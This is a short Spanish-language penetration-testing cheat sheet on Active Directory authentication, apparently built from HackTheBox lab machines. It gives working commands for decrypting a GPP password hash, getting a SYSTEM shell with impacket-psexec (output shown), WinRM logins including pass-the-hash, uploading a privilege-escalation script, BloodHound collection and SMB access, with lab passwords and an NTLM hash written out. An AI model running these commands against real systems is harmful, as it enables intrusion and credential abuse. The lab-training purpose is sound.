AD Authentication
Desencriptar hash de GPP
# gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
GPPstillStandingStrong2k18Autenticacion para obtener shell
# impacket-psexec active.htb/administrator@10.10.10.100
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
Password:
[*] Requesting shares on 10.10.10.100.....
[*] Found writable share ADMIN$
[*] Uploading file jpVGLnQj.exe
[*] Opening SVCManager on 10.10.10.100.....
[*] Creating service avKJ on 10.10.10.100.....
[*] Starting service avKJ.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>
Validacion con crackmapexec para el servicio de WS-Management
crackmapexec winrm 10.10.10.111 -u 'fsmith' -p 'Thestrokes23'Autenticacion con Evil-winRm para el servicio de WS-Management
$ evil-winrm -i 10.10.10.111 -u 'fsmith' -p 'Thestrokes23'
## Subida de ficheros desde local a maquina victima con evilwinrm
$ *Evil-WinRM* PS C:\Users\FSmith\Desktop> upload PrivescCheck.ps1
## Conexion con winRm con Hash
evil-winrm -i 10.10.10.111 -u 'Administrator' -H 823452073d75b9d1cf70ebdf86c7f98e Utilizar ingestor de BloodHound
bloodhound-python -u support -p '#00^BlackKnight' -d blackfield.local -ns 10.10.10.111 -c DcOnlyConsumir el servicio de SMB con usuario del Dominio
smbclient -U svcorp.com/alice%Password01 \\\\10.10.10.111\\Docs
smbmap -u "alice" -p "Password01" -H 10.10.10.111 -d svcorp.comÚltima actualización